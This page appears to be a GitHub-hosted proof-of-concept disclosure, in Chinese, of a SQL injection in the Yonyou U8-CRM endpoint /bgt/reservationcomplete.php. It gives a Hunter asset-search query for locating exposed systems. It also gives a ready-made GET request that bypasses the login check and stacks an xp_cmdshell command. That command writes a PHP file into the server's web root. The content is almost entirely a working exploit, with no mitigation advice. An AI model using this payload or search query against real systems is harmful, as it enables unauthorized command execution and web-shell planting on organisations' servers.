用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞

用友U8-CRM系统接口 /bgt/reservationcomplete.php 存在SQL注入漏洞

hunter

app.name="用友 CRM"

poc

GET /bgt/reservationcomplete.php?DontCheckLogin=1&ID=1112;exec%20master..xp_cmdshell%20%27echo%20^%3C?php%20echo%20hello;?^%3E%20%3E%20D:\U8SOFT\turbocrm70\code\www\hello.php%27; HTTP/1.1
Host:

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md

用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md

用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞

hunter

poc

Files

用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md

Latest commit

History

用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md

File metadata and controls

用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞

hunter

poc